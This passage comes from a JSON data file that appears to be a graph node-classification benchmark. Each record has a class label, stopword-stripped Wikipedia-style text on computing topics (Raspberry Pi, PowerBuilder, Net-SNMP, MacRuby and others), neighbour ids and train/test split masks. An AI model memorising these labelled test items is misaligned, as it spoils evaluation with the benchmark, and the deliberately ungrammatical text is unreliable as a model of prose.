bluetooth 4.2 gigabit ethernet limited approximately 300 mbit/s usb 2.0 bus soc raspberry pi 4 full gigabit ethernet throughput limited funnelled via usb chip pi zero used usb device usb gadget plugged another computer via usb port another machine configured multiple ways example show serial device ethernet device although originally requiring software patches added mainline raspbian distribution may 2016 pi 3 boot usb flash drive firmware limitations models pi 2b v1.2 3a+ 3b 3b+ 4b boards although often pre-configured operate headless computer raspberry pi may also optionally operated generic usb computer keyboard mouse may also used usb storage usb midi converters virtually device/component usb capabilities depending installed device drivers underlying operating system many included default peripherals attached various pins connectors surface raspberry pi video controller generate standard modern tv resolutions hd full hd higher lower monitor resolutions well older ntsc pal standard crt tv resolutions shipped i.e. without custom overclocking support following resolutions 640×350 ega 640×480 vga 800×600 svga 1024×768 xga 1280×720 720p hdtv 1280×768 wxga variant 1280×800 wxga variant 1280×1024 sxga 1366×768 wxga variant 1400×1050 sxga+ 1600×1200 uxga 1680×1050 wxga+ 1920×1080 1080p hdtv 1920×1200 wuxga higher resolutions 2048×1152 may work even 3840×2160 15 hz low frame rate convincing video note also allowing highest resolutions imply gpu decode video formats resolutions fact pis known work reliably h.265 high resolutions commonly used high resolutions however common formats full hd work although raspberry pi 3 h.265 decoding hardware cpu powerful predecessors potentially fast enough allow decoding h.265-encoded videos software gpu raspberry pi 3 runs higher clock frequencies 300 mhz 400 mhz compared previous versions ran 250 mhz raspberry pis also generate 576i 480i composite video signals used old-style crt tv screens less-expensive monitors standard connectorseither rca 3.5 mm phono connector depending model television signal standards supported pal-bghid pal-m pal-n ntsc ntsc-j none raspberry pi models built-in real-time clock booting time set either manually configured previously saved state shutdown provide relative consistency file system network time protocol used update system time connected network real-time hardware clock battery backup ds1307 may added interfaces via 200-pin ddr2 so-dimm connector raspberry pi 1 models a+ b+ pi 2 model b pi 3 models a+ b b+ pi 4 pi zero zero w zero wh gpio j8 40-pin pinout raspberry pi 1 models b first 26 pins pi zero zero w 40 gpio pins unpopulated through-holes exposed soldering instead zero wh wireless header header pins preinstalled model b rev 2 also pad called p5 board p6 schematics 8 pins offering access additional 4 gpio connections gpio pins freed four board version identification links present revision 1.0 removed models b provide gpio access act status led using gpio 16 models a+ b+ provide gpio access act status led using gpio 47 power status led using gpio 35 raspberry pi foundation provides raspbian debian-based linux distribution download well third-party ubuntu windows 10 iot core risc os specialised media centre distributions promotes python scratch main programming languages support many languages default firmware closed source unofficial open source available many operating systems also run raspberry pi including formally verified microkernel third-party operating systems available via official website include ubuntu mate windows 10 iot core risc os specialised distributions kodi media centre classroom management raspberry pi use videocore iv gpu via binary blob loaded gpu boot time sd-card additional software initially closed source part driver code later released however much actual driver work done using closed source gpu code application software makes calls closed source run-time libraries openmax opengl es openvg turn call open source driver inside linux kernel calls closed source videocore iv gpu driver code api kernel driver specific closed libraries video applications use openmax use opengl es use openvg turn use egl openmax egl use open source kernel driver turn official firmware freely redistributable binary blob closed-source minimal proof-of-concept open source firmware also available mainly aimed initializing starting arm cores well performing minimal startup required arm side also capable booting minimal linux kernel patches remove dependency mailbox interface responsive known work raspberry pi 1 2 3 well variants raspberry pi zero working state actively developed last significant commits made around mid-2017 technology writer glyn moody described project may 2011 potential replacing machines supplementing march 2012 stephen pritchard echoed bbc micro successor sentiment itpro alex hope co-author next gen report hopeful computer engage children excitement programming co-author ian livingstone suggested bbc could involved building support device possibly branding bbc nano centre computing history strongly supports raspberry pi project feeling could usher new era release board showcased arm ceo warren east event cambridge outlining google ideas improve uk science technology education harry fairhead however suggests emphasis put improving educational software available existing hardware using tools google app inventor return programming schools rather adding new hardware choices simon rockman writing zdnet blog opinion teens better things despite happened 1980s october 2012 raspberry pi t3 innovation year award futurist mark pesce cited borrowed raspberry pi inspiration ambient device project moorescloud october 2012 british computer society reacted announcement enhanced specifications stating definitely something 'll want sink teeth february 2015 switched-mode power supply chip designated u16 raspberry pi 2 model b version 1.1 initially released version found vulnerable flashes light particularly light xenon camera flashes green red laser pointers however bright lights particularly ones continuously found effect symptom raspberry pi 2 spontaneously rebooting turning lights flashed chip initially users commenters suspected electromagnetic pulse emp xenon flash tube causing problem interfering computer digital circuitry ruled tests light either blocked card aimed side raspberry pi 2 cause problem problem narrowed u16 chip covering first system chip main processor u16 blu-tack opaque poster mounting compound light sole culprit instead emp confirmed laser pointer tests also found less opaque covering needed shield laser pointers shield xenon flashes u16 chip seems bare silicon without plastic cover i.e chip-scale package wafer-level package would present block light unofficial workarounds include covering u16 opaque material electrical tape lacquer poster mounting compound even balled-up bread putting raspberry pi 2 case avoiding taking photos top side board xenon flash issue caught release raspberry pi 2 commercial electronic devices routinely subjected tests susceptibility radio interference standard common practice test susceptibility optical interference june 2017 raspberry pi royal academy engineering macrobert award citation award raspberry pi said inexpensive credit card-sized microcomputers redefining people engage computing inspiring students learn coding computer science providing innovative control solutions industry raspberry pi community described jamie ayre floss software company adacore one exciting parts project community blogger russell davis said community strength allows foundation concentrate documentation teaching community developed fanzine around platform called magpi 2015 handed raspberry pi foundation volunteers continued in-house series community raspberry jam events held across uk around world enquiries board united kingdom received schools state private sectors around five times much interest latter hoped businesses sponsor purchases less advantaged schools ceo premier farnell said government country middle east expressed interest providing board every schoolgirl enhance employment prospects 2014 raspberry pi foundation hired number community members including ex-teachers software developers launch set free learning resources website foundation also started teacher training course called picademy aim helping teachers prepare teaching new computing curriculum using raspberry pi classroom 2018 nasa launched jpl open source rover project scaled curiosity rover uses raspberry pi control module encourage students hobbyists get involved mechanical software electronics robotics engineering number developers applications leveraging raspberry pi home automation programmers making effort modify raspberry pi cost-affordable solution energy monitoring power consumption relatively low cost raspberry pi become popular economical alternative expensive commercial solutions june 2014 polish industrial automation manufacturer techbase released modberry industrial computer based raspberry pi compute module device number interfaces notably rs-485/232 serial ports digital analogue inputs/outputs economical 1-wire buses widely used automation industry design allows use compute module harsh industrial environments leading conclusion raspberry pi longer limited home science projects widely used industrial iot solution achieve goals industry 4.0 march 2018 suse announced commercial support suse linux enterprise raspberry pi 3 model b support number undisclosed customers implementing industrial monitoring raspberry pi otto digital camera created next thing co incorporates raspberry pi compute module successfully crowd-funded may 2014 kickstarter campaign slice digital media player also uses compute module heart crowd-funded august 2014 kickstarter campaign software running slice based kodi project launched december 2014 event held uk space agency astro pi competition officially opened january opened primary secondary school aged children residents united kingdom mission british esa astronaut tim peake deployed computers board international space station loaded winning code orbit collected data generated sent earth distributed winning teams covered themes competition included spacecraft sensors satellite imaging space measurements data fusion space radiation organisations involved astro pi competition include uk space agency ukspace raspberry pi esero-uk esa 2006 early concepts raspberry pi based atmel atmega644 microcontroller schematics pcb layout publicly available foundation trustee eben upton assembled group teachers academics computer enthusiasts devise computer inspire children computer inspired acorn bbc micro 1981 model model b model b+ names references original models british educational bbc micro computer developed acorn computers first arm prototype version computer mounted package size usb memory stick usb port one end hdmi port foundation goal offer two versions priced us 25 35 started accepting orders higher priced model b 29 february 2012 lower cost model 4 february 2013. even lower cost us 20 a+ 10 november 2014 26 november 2015 cheapest raspberry pi yet raspberry pi zero launched us 5 £4",
    "neighbors": [
      1537,
      3585,
      7170,
      516,
      11282,
      4124,
      5663,
      8225,
      6178,
      9762,
      38,
      4139,
      2605,
      8237,
      561,
      9266,
      9779,
      1590,
      4151,
      8248,
      8250,
      8253,
      6718,
      6207,
      10813,
      1089,
      7234,
      10820,
      582,
      4679,
      11337,
      8266,
      2635,
      2137,
      9320,
      10344,
      1642,
      10862,
      644,
      7300,
      8326,
      11396,
      3722,
      1682,
      659,
      9365,
      9366,
      10393,
      666,
      154,
      7325,
      4773,
      10921,
      5291,
      7854,
      9391,
      9913,
      8383,
      1728,
      10433,
      10945,
      5830,
      10440,
      3793,
      724,
      4821,
      9434,
      5339,
      10971,
      2784,
      2788,
      3300,
      7913,
      4844,
      2285,
      4334,
      5356,
      1776,
      7919,
      7920,
      9964,
      10480,
      6393,
      9978,
      3835,
      2811,
      2814,
      1790,
      6910,
      2308,
      6925,
      786,
      4887,
      11555,
      2862,
      7983,
      823,
      1849,
      6978,
      6979,
      7492,
      6981,
      8005,
      11080,
      5963,
      2383,
      9557,
      8539,
      349,
      6495,
      1377,
      4964,
      8036,
      10601,
      362,
      8554,
      9581,
      10606,
      6001,
      9074,
      2420,
      10109,
      6016,
      8576,
      4995,
      9604,
      392,
      405,
      5019,
      4508,
      7069,
      5536,
      8098,
      10658,
      5028,
      7077,
      9638,
      10149,
      428,
      10675,
      1461,
      3511,
      10173,
      11200,
      9155,
      7108,
      2502,
      4040,
      9163,
      7631,
      2006,
      2519,
      4569,
      6618,
      2524,
      477,
      8675,
      10734,
      6129,
      499
    ],
    "mask": "Test"
  },
  {
    "node_id": 1850,
    "label": 1,
    "text": "SQL_Server_Management_Objects:sql server management objects sql server management objects smo .net objects introduced microsoft microsoft sql server 2005 designed allow easy simple programmatic management microsoft sql server using smo .net programmers design applications similar functionality microsoft sql server management studio smo objects comes sql server versions starting sql server 2005 2005 2008 2008r2 2012 2014 2016 included sql server editions including express edition sql server management objects smo msdn",
    "neighbors": [
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 1851,
    "label": 8,
    "text": "Apache_Axis2:apache axis2 apache axis2 core engine web services complete re-design re-write widely used apache axis soap stack implementations axis2 available java c. axis2 provides capability add web services interfaces web applications also function standalone application server new architecture axis2 introduced august 2004 axis2 summit colombo sri lanka new architecture axis2 based flexible efficient configurable comparison axis1.x architecture well-established concepts axis 1.x like handlers etc. preserved new architecture apache axis2 supports soap 1.1 soap 1.2 integrated support widely popular rest style web services business-logic implementation offer ws-* style interface well rest/pox style interface simultaneously axis2/java support spring framework axis2/c high-performance web services implementation implemented portability ability embedded hosted apache httpd microsoft iis axis http server see article apache axis2/c performance 2008 latest release occurred 2009 axis2 came many new features enhancements industry specification implementations key features offered include apache axis2 includes support following standards list features selling points cited apache axis site axis2 modules provides qos features like security reliable messaging etc",
    "neighbors": [
      1280,
      8070,
      10377,
      6284,
      8460,
      7567,
      1296,
      6161,
      6805,
      5910,
      1047,
      8217,
      11161,
      6555,
      6811,
      5789,
      8860,
      10020,
      3877,
      10661,
      11303,
      5677,
      1327,
      7983,
      4919,
      5047,
      6328,
      4538,
      6074,
      7485,
      7742,
      9789,
      7233,
      6338,
      4419,
      10877,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      10949,
      4944,
      6353,
      1363,
      8408,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      11105,
      11235,
      8294,
      11111,
      1128,
      8425,
      8810,
      747,
      5612,
      4593,
      2163,
      6774,
      7159,
      10486,
      1913,
      1018,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1852,
    "label": 2,
    "text": "MacRuby:macruby macruby discontinued implementation ruby language ran objective-c runtime corefoundation framework development apple inc. supposed replace rubycocoa targeted ruby 1.9 used high performance llvm compiler infrastructure starting version 0.5 supports ahead-of-time just-in-time compilation macruby supported interface builder shipped core library called hotcocoa simplify cocoa programming macruby also used embedded scripting language objective-c applications may 2012 laurent sansonetti announced rubymotion port macruby ios os x android development macruby effectively ended late 2011 coinciding principal author departure apple inc.. jan 5 2015 macruby project longer active development macruby work mavericks team shifted focus commercial rubymotion product ios os x. macruby originally called ruby+objc developed laurent sansonetti began work late 2007 march 2008 first publicly available version macruby 0.1 announced official rubytalk forum version 0.2 released june 2008 implemented ruby strings arrays hashes native cocoa types september 2008 macruby 0.3 released included hotcocoa library well several hotcocoa example programs october 2008 apple created first macruby page developer connection website macruby 0.4 released march 2009 macruby 0.5 0.6 0.7 january may october 2010 respectively macruby 0.8 released december 13 2010 0.9 february 25 2011 0.10 march 23 2011 0.11 october 17 2011 0.12 june 11 2012",
    "neighbors": [
      7430,
      9229,
      2191,
      7695,
      10771,
      9245,
      5409,
      8609,
      10406,
      7983,
      564,
      4277,
      5945,
      5567,
      6338,
      11208,
      5578,
      3790,
      4943,
      10973,
      1379,
      10470,
      11625,
      8303,
      2804,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1853,
    "label": 2,
    "text": "ANDOS:andos andos russian operating system electronika bk-0010 electronika bk-0011 electronika bk-0011m series computers created 1990 first released 1992 initially developed alexey nadezhin whose name system named later also sergey kamnev joined project widespread system bk series computers used ms-dos-compatible file system format andos used fat12 filesystem 800 kb floppy disks electronika bk-0011m electronika bk-0011 andos provided electronika bk-0010 emulation loading bk-0010 rom image bk-0011 ram minimal configuration system able occupy less 4 kb ram system able support 64 disk drives hard drive partitions well ram disks computer memory tape recording also able read-only access microdos file system format disks although last version function transferred system core file manager became optional",
    "neighbors": [
      2179,
      8713,
      11145,
      7823,
      5267,
      9762,
      10156,
      7983,
      5043,
      7224,
      3129,
      7358,
      8262,
      4039,
      9166,
      477,
      1253,
      4076,
      5359
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1854,
    "label": 3,
    "text": "Fantasy_Zone_II:_The_Tears_of_Opa-Opa:fantasy zone ii tears opa-opa past courageous hero opa-opa saved fantasy zone invading nenon forces victory came price forced fight father led invasion space year 1432 10 years battle nenon forces spreading chaos fantasy zone opa-opa must fly fantasy zone rout invasion end game opa-opa comes face-to-face invasion mastermind identical copy tense battle opa-opa father appears confront sight brings opa-opa tears causes second opa-opa vanish later revealed twin physical manifestation opa-opa dark impulses desires spawned prior battles seeking drive fantasy zone ruin reunited father opa-opa able purge darkness swears disaster never occur similar defender player occupies side-scrolling level repeats indefinitely player freely travel left right zone contains several bases serve primary targets new sequel warps hidden behind certain bases allow player travel different zones level least three zones bases cleared zones level player travel warp boss boss fights allow free travel main stages force player face boss face particular direction bosses generally large change color reflect damage taken final stage boss rush player must fight succession previous bosses fighting final boss two action buttons correspond two types attacks fire bomb fire attacks shoot horizontally typical shooter different variants purchased shops bomb attacks powerful basic bomb drops downward variants behaviors limited quantity shops uncovered key points allow player purchase upgraded weapons bombs speed well extra lives upgrades opa-opa speed larger wings jet engines permanent long player lose life weapon upgrades time-limited bombs limited quantity items become increasingly expensive subsequent purchases encouraging player vary purchases arcade version fantasy zone ii based system e board result almost identical master system version differences include use radar shows bases destroyed well use timer reaches zero player lose life player manages clear level timer remaining seconds add score money unlike original version famicom port subtitle title screen says teardrop opa-opa september 2008 sega released remake fantasy zone ii part compilation sega ages vol 33 fantasy zone complete collection developed m2 game unique remakes attempt modernize older work rather ground-up reimagining title arcade game system 16 hardware like predecessor rather console title limited sega master system described remake strictly adheres technical limitations time fantasy zone ii originally released m2 ceo naoki horii stated remake inspired disappointment fantasy zone never got true arcade sequel played sms game lot horii explained heart hearts really wanted see arcade hardware ensure remake would authentic system 16 unique hardware capabilities limitations m2 developed title real system 16 hardware modest memory increase 256kb m2 dubbed system 16c playable compilation via company emulation technology shows 1987 sega copyright makes mention m2 bears titular distinction original game easily confused real arcade title 1987 fans dubbed version fantasy zone ii dx distinguish original versions remake beyond scope features requested sega available budget horii funded development out-of-pocket amount described cost new car follows original fantasy zone ii loosely pulling enemies music locations gameplay elements master system game pairing completely new content elements original arcade fantasy zone notable change level structure rather several distinct zones stage must cleared stage remake two parallel dimensions bright side dark side comparable size levels first fantasy zone bases destroyed one dimension also destroyed making possible clear level entirely one side dark side difficult offers greater rewards points money earned bosses either side considerably difficult attack patterns dark side game also features three endings depend whether dark side levels cleared whether specific items bought music arranged manabu namiki uses melodies many songs tokuhiko uwabo original fantasy zone ii soundtrack calculatedly rearranged style similar original fantasy zone composer hiroshi kawaguchi namiki also wrote original tracks game stages enemies largely based themes original difficult recognize half game bosses correspond original generally regarded loose interpretation original m2 released free demo version fantasy zone ii website lets download play first second levels windows computer game bootlegged released arcades title fz-2006 ii taiwanese manufacturer isg bootleg bears 2006 copyright date actually appears derived 2008 playstation 2 release due containing 2008-07-15ver string embedded rom data sega also produced limited number arcade units running real system 16 hardware promote game release nintendo 3ds port 16-bit version fantasy zone ii released japan 2014 internationally 2015 titled 3d fantasy zone ii w includes new features content second game mode called link loop land endless survival mode starring opa-opa brother upa-upa",
    "neighbors": [
      10316,
      9006,
      11231
    ],
    "mask": "None"
  },
  {
    "node_id": 1855,
    "label": 2,
    "text": "17_(app):17 app 17 live video streaming mobile app designed taiwanese pop singer jeffery huang member machi features instant photo video sharing functions client apps available ios android smartphone systems first launched app store 5 june 2015 sooner play store 10 june 2015 app re-released 28 october 2015 banned due prohibited content app become one popular live streaming apps taiwan malaysia hong kong singapore japan approximately 700 thousand daily active users 17 allows users broadcast live post photos videos album privacy settings used allow access rights permitted users users also follow one another track recent status changes app complained become platform broadcasting indecent scenes live broadcast sexual intercourse process app found unauthorized broadcasting lives attracted millions audience watch founder 17 jeffery huang claimed broadcast would stopped user ’ account would deleted received complaints also responded would stricter supervision system avoid similar incidents happening april 2016 according security website customer data 17 sold tor hidden website data include 4 million email addresses along ip addresses usernames unsalted md5 passwords users registered around time change passwords",
    "neighbors": [
      8413,
      9063
    ],
    "mask": "Test"
  },
  {
    "node_id": 1856,
    "label": 9,
    "text": "PowerBuilder:powerbuilder powerbuilder integrated development environment owned sap since acquisition sybase 2010 july 5 2016 sap appeon entered agreement whereby appeon would responsible developing selling supporting powerbuilder powerbuilder use since 1991 peaking around 1998 around 100,000 users powerbuilder market share declined years many applications created still use today years powerbuilder updated new standards 2010 major upgrade powerbuilder released provide support microsoft .net framework 2014 support added odata dockable windows 64-bit native applications 2017 support added ios android app development powerbuilder 2019 provides new targets enable developers rapidly create restful web apis non-visual .net assemblies test-driven manner using c language .net core framework powerscript client app development revamped new ui technologies cloud architecture powerbuilder native data-handling object called datawindow used create edit display data database object gives programmer number tools specifying controlling user interface appearance behavior also provides simplified access database content json xml web services extent datawindow frees programmer considering differences database management systems different vendors datawindow display data using multiple presentation styles connect various data sources powerbuilder used primarily building business crud applications although new software products rarely built powerbuilder many client-server erp products line-of-business applications built late 1980s early 2000s powerbuilder still provide core database functions large enterprises government higher education manufacturing insurance banking energy telecommunications job openings powerbuilder developers readily available often revolve around maintaining existing applications powerbuilder originally developed powersoft 1991 powersoft went public 1993 acquired sybase 904 million sybase stock 1995 may 2010 sap announced would acquiring sybase 5.8 billion powerbuilder languished long time several reasons powerbuilder 12 compatibility web technologies asp.net web services represented attempt regain market share order move developers newer versions powerbuilder 12 provided utilities attempt simplify migration december 2013 sap announced new version going directly number 15 released beta version key features included support .net framework v4.5 sql server 2012 oracle 12 windows 8 odata dockable windows sap later released version 12.6 july 5 2016 appeon signed agreement sap develop new generation powerbuilder development platform appeon announced plans major innovations ranging mobile cloud deployment test-driven development continuous integration terms agreement sap appeon responsible developing selling supporting offering powered powerbuilder technology june 30 2017 powerbuilder 2017 launched appeon release first new installment powerbuilder appeon first release powerbuilder support windows 10 ios android app development may 31 2019 powerbuilder 2019 launched appeon release second new installment powerbuilder appeon first release powerbuilder support c development provides new c ide .net data access objects c migration solution web api client ui themes powerscript object-oriented programming language nearly visual non-visual objects support inheritance polymorphism encapsulation programmer may utilize common code framework powerbuilder foundation classes also known pfc inherit objects leverage pre-existing code datawindow key component selling point powerbuilder datawindow offers visual sql painter supports outer joins unions subquery operations convert sql visual representation back developer use native sql desired datawindow updates automatic — produces proper sql runtime based dbms user currently connected feature makes easier developers experienced sql datawindow also built-in ability retrieve data update data via stored procedures rest web apis well import/export json data restclient object introduced powerbuilder 2017 facilitates bridging datawindow rest web apis requiring minimal coding powerbuilder offers native interfaces major databases well odbc ole-db enterprise version many connectivity options allow performance monitoring tuning due information database schema primary key information stored powerbuilder data dictionary code required implement data display browsing greatly simplified dictionary information allows generation appropriate sql behind scenes powerbuilder supports following ways interacting database datawindow simplest approach relying automatically generated sql powerbuilder supports activex ocx controls visible non-visible also use ole automation client however powerbuilder supports late binding early binding therefore using ole automation dropdown possible actions provided powerbuilder also act dde client server providing mechanism interoperate applications powerbuilder make windows third-party api calls general works well third-party libraries dll files however directly support callback functions powerbuilder offers /pbdebug variants -pbdebug -pbd /debug -debug -deb runtime switch creates log file help track bug field user simply emails log file developer another feature log sql statements file also built-in performance profiling integrated debugger context-sensitive help active newsgroup provide support powerbuilder applications typically compiled p-code interpreted powerbuilder run time although compiled machine code called c-code typical business application run lot faster however applications unusually large number cpu-intensive computations likely benefit 4,000x faster compiling machine code main reason compiling machine code used enormous number errors powerbuilder especially machine code generation extensibility language rather limited older versions powerbuilder technologies provided overcome ex powerbuilder native interface pbni rather tricky develop solution includes external c++ code may require competent c++ developer also powerbuilder expert guide developer myriad subtleties language powerbuilder virtual machine inheritance object-oriented features limited object types windows userobjects menus particular possible inherit datawindow powerbuilder user open descendant parent time painter though see ancestors code working descendant address criticisms appeon set new roadmap powerbuilder publishes openly appeon website classic powerscript language still available compatibility reasons known language built around datawindow amongst developers powerbuilder ide built around datawindow c development centered around new .net datawindow automated migration existing datawindows introduced powerbuilder 2019 since appeon took powerbuilder launched new official community website powerbuilder developers community website offers technical articles webinars q authored community users appeon also hosts annual user conference called appeon elevate recordings conference sessions available conference website number local user groups around world cooperate appeon deliver abridged versions conference seminar format local language also variety grass roots community groups resources powerbuilder developers share convene powerbuildertv series webinars powerbuilder users vendors tend focus third party add-ons powerbuilder central community initiative create single source third party add-ons services",
    "neighbors": [
      2183,
      6797,
      9360,
      8473,
      5403,
      10020,
      9130,
      10029,
      10413,
      7983,
      1459,
      3507,
      5952,
      1348,
      4042,
      11212,
      11472,
      6993,
      9813,
      5210,
      479,
      7274,
      3573,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 1857,
    "label": 1,
    "text": "SHERPA/Juliet:sherpa/juliet sherpa/juliet online database open access mandates adopted academic funding bodies part sherpa suite services around open access run jisc formerly university nottingham database contains information 100 funders mostly united kingdom juliet indicates policy regarding self-archiving open access journals archival research data users suggest updates records addition new funder via form service mainly useful researchers received project-based funding want clear summary funder links original policies also provided",
    "neighbors": [
      7923,
      10759
    ],
    "mask": "Test"
  },
  {
    "node_id": 1858,
    "label": 4,
    "text": "L7-filter:l7-filter l7-filter software package provides classifier linux netfilter subsystem categorize internet protocol packets based application layer data major goal tool make possible identification peer-to-peer programs use unpredictable port numbers two versions software first implemented kernel module linux 2.4 2.6 second experimental version released december 2006 runs user-space program relies netfilter user-space libraries classification process versions l7-filter use regular expressions though user-space kernel modules use different regular expression libraries identify network protocol technique used conjunction linux qos system allows application-specific yet port-independent traffic shaping versions l7-filter released gnu general public license",
    "neighbors": [
      1792,
      2049,
      4480,
      2563,
      6797,
      1172,
      9496,
      3482,
      1436,
      4511,
      6431,
      10016,
      10531,
      5924,
      550,
      8998,
      10790,
      3243,
      1708,
      3885,
      8753,
      823,
      569,
      5178,
      11577,
      9279,
      8640,
      5057,
      10433,
      11073,
      2118,
      4814,
      9423,
      10574,
      7121,
      10451,
      10708,
      4568,
      4953,
      9048,
      2907,
      6364,
      5472,
      5860,
      3942,
      10987,
      8943,
      8816,
      9971,
      10872,
      1273,
      9983
    ],
    "mask": "Test"
  },
  {
    "node_id": 1859,
    "label": 5,
    "text": "Net-SNMP:net-snmp net-snmp suite software using deploying snmp protocol v1 v2c v3 agentx subagent protocol supports ipv4 ipv6 ipx aal5 unix domain sockets transports contains generic client library suite command line applications highly extensible snmp agent perl modules python modules net-snmp housed sourceforge usually top 100 projects sourceforge ranking system march 2005 sourceforge project month widely distributed comes included many operating systems including distributions linux freebsd openbsd solaris os x also available net-snmp web site steve waldbusser cmu started freely available snmp tool kit 1992 package later abandoned cmu wes hardaker uc davis renamed ucd-snmp extended meet network management needs electrical engineering department eventually mr. hardaker left university realized project network wide thus renamed net-snmp reflect distributed development roots net-snmp project long full description found net-snmp history page command snmpget uses snmpget application retrieve information associated specific object identifier oid target device example snmpget usage retrieve specific oid 'sysuptime community string 'demopublic 'test.net-snmp.org host name agent query command snmpwalk uses snmp getnext request query network tree information object identifier oid may given command line oid specifies portion object identifier space searched using getnext requests variables subtree given oid queried values presented user oid argument present snmpwalk search subtree rooted snmpv2-smi :mib-2 including mib object values mib modules defined lying within subtree example snmpwalk usage retrieve variables system oid",
    "neighbors": [
      5093,
      8582,
      9320,
      8873,
      8554,
      7983,
      2045,
      2804,
      823,
      5469,
      3133,
      5470
    ],
    "mask": "Train"
  },
  {
    "node_id": 1860,
    "label": 6,
    "text": "File_System_Visualizer:file system visualizer file system visualizer also known fsv 3d file browser using opengl created daniel richard g. clone sgi fsn file manager irix systems aimed run modern linux unix-like operating systems capable representing file systems two ways mapv mode files directories represented cuboids equal height size cuboid representing size file directory treev mode files directories shown conventional tree manner links parent directories subdirectories columns various height indicating file size top directories represent files inside modes standard 2d tree representation files directories displayed left window mouse used rotate 3d representation file system eagle eye function shows representation overhead view file system visualizer also capable manipulating files directories shows",
    "neighbors": [
      6243,
      10051,
      7983,
      5397,
      11221,
      823,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 1861,
    "label": 4,
    "text": "Cris_Thomas_(Space_Rogue):cris thomas space rogue cris thomas also known space rogue american cyber security researcher white hat hacker founding member researcher high-profile hacker security think tank l0pht heavy industries thomas one seven l0pht members testified u.s. senate committee governmental affairs 1999 topic government homeland computer security specifically warning internet vulnerabilities claiming group could take internet within 30 minutes subsequently thomas pursued career cyber security research also embracing public advocacy role cyber security subject-matter expert sme pundit granting interviews contributing articles space rogue advocacy served educate advise corporations government public security concerns relative risk areas election integrity cyber terrorism technology anticipation new risks associated society adoption internet things balancing perspective risk vs. hype founding member hacker think tank l0pht heavy industries thomas first l0pht members leave following merger l0pht stake 2000 last reveal true name thomas one seven l0pht members testified u.s. senate committee governmental affairs 1999 testifying internet handle space rogue testimony thomas l0pht members served inform government current future internet vulnerabilities federal public channels susceptible testimony marked first time persons federal witness protection permitted testify assumed names l0pht thomas created whacked mac archives hacker news network addition released least one security advisories detailing flaw fwb hard disk toolkit thomas continued career cyber security research stake guardent trustwave spiderlabs tenable ibm x-force red selected serve panelist 2016 atlantic council cyber risk discussion series webinar speaker national science foundation watch series thomas embraced public advocacy role cyber security subject-matter expert sme pundit granting interviews contributing articles educate public security concerns relative risk topics include election integrity cyber terrorism technology password security anticipation new risks associated society adoption internet things balancing perspective risk vs. hype response 2016 united states government accountability office report revealing nation nuclear weapons control computers relied outdated 8 floppy disks thomas argued older computers data storage systems programming languages lack internet connectivity would make difficult hackers access systems effectively reducing vulnerability weapon control systems hacking following cyber security mega-breaches target home depot u.s. office personnel management thomas advocated proactive implementation basic security measures effective means thwart similar mega-threats bluntly stating gap knowledge implementation leaves companies individuals unnecessary risk thomas ’ recommendation focused simple measures known one two decades organizations implemented universally thomas identified retail cyber security breaches including fao schwarz early 1999 2017 defcon hacker conference thomas assisted escorting rep. hurd r rep. jim langevin around conference area various villages whacked mac archives ftp download site managed thomas world largest collection apple macintosh hacking tools total size tools site 20mb cd copy contents ftp site advertised sale serving editor-in-chief thomas founded managed l0pht online newsletter website known hacker news network simply hacker news hnn originally created rapidly share discoveries computer security hacker news also became forum users post security alerts vulnerabilities identified publication grew eventually supporting paid advertising audience included technology journalists companies interest cybersecurity website seen several background shots video solar sunrise dawn new threat produced national counterintelligence center 1999 l0pht merger stake 2000 responsible disclosure-focused hacker news network replaced security news network hacker news network decade offline set launch jan. 11 2010 video reports security last videos published 2011 hacker news network 2018 redirects spacerogue.net 2013 thomas created project cybersquirrel1 satirical demonstration relative risk cyberwarfare attacks critical infrastructure elements north american electrical grid started twitter feed cybersquirrel1 project expanded include full website cybersquirrel tracking map dataset grew attrition.org brian martin alias “ jared e. richo ” a/k/a jericho joined project 2014 cybersquirrel1 results disrupted public perception regarding prevalence nation-based hacking cyberwarfare attacks concluding damage due cyberwarfare example stuxnet tiny compared cyber-threat caused animals 2015-2016 alleged russian interference 2016 united states elections unfolded public media interest hacking hackers increased leading 2016 election thomas interviewed mainstream media productions including cnbc money release joint analysis report thomas called expanded detail indicators compromise federal joint analysis reports indicating increased transparency ip address reporting instrumental enhancing security prior 2018 election thomas continued advocacy speaking cbs news outlets securing elections vulnerability voting machines",
    "neighbors": [
      9217,
      3843,
      3619,
      1861,
      8580,
      8135,
      5512,
      4830,
      8827,
      4945,
      9392,
      5111,
      9214,
      4471,
      9688,
      3323,
      4956,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 1862,
    "label": 7,
    "text": "National_Grid_Service:national grid service national e-infrastructure service nes formerly national grid service organisation uk academics researchers 2004 2011 funded two governmental bodies engineering physical sciences research council epsrc joint information systems committee jisc nes provided compute data resources accessed standard common set services nes services based globus toolkit job submission storage resource broker data management nes resources hosted scientific software packages including siesta gaussian well providing access compute data resources nes offered training national e-science centre edinburgh grid support uk academics researchers grid computing nes 500 users twenty nine sites nes gridpp two organisations made uk ngi organisation uk point contact european grid infrastructure prior nes uk e-science programme funded grid support centre later grid operations support centre gosc provided support end users use develop grid computing following uk engineering task force developing so-called 'level 2 grid ad hoc collection individual institutes committing variety compute resources grid computing nes funded develop full service initially called etfp grid engineering task force production grid became known national grid service hardware purchased installed february 2004 web site appeared april 2004 phase 1 october 2004 september 2006 worked separately funded grid operations support centre gosc start phase two october 2006 ngs gosc merged single project name nes nes third phase ran september 2011 nes provided free-to-use services uk academic researchers nes following partner sites affiliate sites provided resources nes conditions sometimes provide access users common ngs interfaces members gridpp collaboration also offered resources academics uk could apply free account nes science research ranged permeation drugs membrane welfare ethnic minority groups united kingdom applications included modelling coastal oceans modelling hiv mutations research cameras imaging patients cancer treatments simulating galaxy formation example use nes motivation methodology implementation e-social science pilot demonstrator project entitled grid enabled micro-econometric data analysis gemeda used nes investigate policy relevant social science issue welfare ethnic minority groups united kingdom underlying problem statistical analysis uses quantitative data one source application grid technology problem allows one integrate elements required empirical modelling process data extraction data transfer statistical computation results presentation manner transparent casual user examples research using nes published 2006 2011",
    "neighbors": [
      9984,
      4195,
      5956,
      10116,
      10341,
      1449,
      8370,
      5654,
      11353
    ],
    "mask": "Validation"
  },
  {
